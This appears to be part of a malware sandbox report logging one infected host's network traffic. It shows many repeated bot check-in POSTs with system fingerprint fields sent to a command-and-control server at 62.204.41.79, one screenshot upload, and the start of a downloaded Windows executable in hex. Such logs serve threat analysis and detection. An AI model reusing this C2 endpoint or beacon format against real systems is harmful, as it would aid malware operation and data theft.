                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1OTc2Host: 62.204.41.79Content-Length: 106128Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 13 Dec 2022 19:08:56 GMTContent-Type: application/octet-streamContent-Length: 249344Last-Modified: Tue, 13 Dec 2022 15:02:22 GMTConnection: keep-aliveETag: "639893fe-3ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b9 a5 58 48 fd c4 36 1b fd c4 36 1b fd c4 36 1b a6 ac 35 1a f7 c4 36 1b a6 ac 33 1a 61 c4 36 1b a6 ac 32 1a ef c4 36 1b 28 a9 32 1a ef c4 36 1b 28 a9 35 1a ef c4 36 1b 28 a9 33 1a d4 c4 36 1b a6 ac 37 1a f2 c4 36 1b fd c4 37 1b 5c c4 36 1b 66 aa 3f 1a fc c4 36 1b 66 aa c9 1b fc c4 36 1b 66 aa 34 1a fc c4 36 1b 52 69 63 68 fd c4 36 1b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8a 8b 98 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e8 02 00 00 10 01 00 00 00 00 00 40 90 01 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 